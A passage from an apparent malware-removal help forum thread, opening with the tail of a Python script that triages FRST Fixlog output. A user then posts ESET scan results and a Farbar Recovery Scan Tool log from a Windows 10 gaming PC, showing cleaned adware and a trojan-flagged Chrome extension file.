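[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoRebootWithLoggedOnUsers"="0"

=== End of ExportKey ===
'''

# Assumption for this example: Windows Update policy values that redirect or
# switch off updates, so they deserve a closer look on an unmanaged home PC.
REVIEW_VALUES = {
    "wuserver", "wustatusserver", "usewuserver", "noautoupdate",
    "disablewindowsupdateaccess", "donotconnecttowindowsupdateinternetlocations",
}

ITEM_RE = re.compile(r'^(?P<target>.+?) => (?P<outcome>.*(?:successfully|not found).*)$')
BANNER_RE = re.compile(r'^=+ (?P<title>.+?) =+$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def parse_fixlog(text):
    """Return (items, commands, exported) parsed from Fixlog text."""
    items, commands, exported = [], [], {}
    mode, cmd, key = None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        banner = BANNER_RE.match(line)
        if banner:
            title = banner.group('title')
            if title.startswith('End of'):
                if mode == 'cmd':
                    commands.append(cmd)
                mode = None
            elif title.startswith('ExportKey:'):
                mode = 'export'
            elif re.match(r'[A-Za-z]{2,}:', title):
                mode = 'skip'   # "Folder:", "EmptyTemp:" and similar sections
            else:
                # Heuristic: any other banner is the echo of a cmd: directive.
                mode, cmd = 'cmd', {'command': title, 'output': []}
            continue
        if not line:
            continue
        if mode == 'cmd':
            cmd['output'].append(line)
        elif mode == 'export':
            if line.startswith('['):
                key = line.strip('[]')
                exported.setdefault(key, {})
            else:
                m = VALUE_RE.match(line)
                if m and key:
                    exported[key][m['name']] = m['data']
        elif mode is None:
            m = ITEM_RE.match(line)
            if m:
                items.append((m['target'].strip('"'), m['outcome']))
    return items, commands, exported


def triage(text):
    """List (kind, detail) findings a helper would want to look at."""
    items, commands, exported = parse_fixlog(text)
    findings = [('not-found', t) for t, outcome in items if 'not found' in outcome]
    for c in commands:
        # Only the cmd.exe "unknown command" error is detected here.
        if 'is not recognized as an internal or external command' in ' '.join(c['output']):
            findings.append(('cmd-failed', c['command']))
    for key, values in exported.items():
        for name, data in values.items():
            kind = 'policy-review' if name.lower() in REVIEW_VALUES else 'policy-info'
            findings.append((kind, f'{key}\\{name}={data}'))
    return findings


if __name__ == '__main__':
    for kind, detail in triage(SAMPLE_FIXLOG):
        print(f'{kind:14} {detail}')
```
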

#11 miggybruh

Posted 21 July 2022 - 07:26 PM

Here is eset.txt

7/21/2022 17:21:52 PM
Files scanned: 995544
Detected files: 3
Cleaned files: 3
Total scan time 01:55:27
Scan status: Finished
C:\FRST\Quarantine\C\Users\Miggy\AppData\Local\chrome_tab\background.js JS/Chromex.Agent.BM trojan cleaned by deleting
 
C:\FRST\Quarantine\C\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe a variant of WinGo/Globalhop.B potentially unwanted application cleaned by deleting
 
C:\FRST\Quarantine\C\Users\Miggy\AppData\Local\Programs\RestMinder\sdk.dll a variant of WinGo/Globalhop.A potentially unwanted application cleaned by deleting
 
Here is FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-07-2022
Ran by Miggy (administrator) on MIGGYPC (Gigabyte Technology Co., Ltd. A320M-S2H) (21-07-2022 17:22:16)
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Platform: Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Rocksteady Studios Ltd.) [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\BatmanAK.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <8>
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\GameOverlayUI.exe
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.6.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Realtek Semiconductor Corp) C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj\RtkUWP.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32706000 2022-07-19] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19970464 2022-07-08] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {03FE5072-C0AA-4FD4-A5AB-D07AB72268EE} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-06-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1D22A23D-A8AC-4920-9D07-A55F94E7D9EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {252A9582-5B4F-4191-9010-B1BB0DFF8B00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {592A03EA-5CC2-4DCE-8D23-D389B778676B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {8184678B-D5E0-4F9D-A393-D29C7ED8D710} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {967C49C7-7365-496B-84CC-F943F6485839} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FC1BCD53-BD5F-46F6-B451-6482CD8B026A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
 
Edge: 
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
 
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2022-07-17]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-17]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
 
Chrome: 
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-21]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-07-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2022-07-17]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11238024 2022-07-21] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [553264 2020-12-28] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10477800 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [8737992 2022-01-23] (PUBG CORPORATION -> PUBG Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
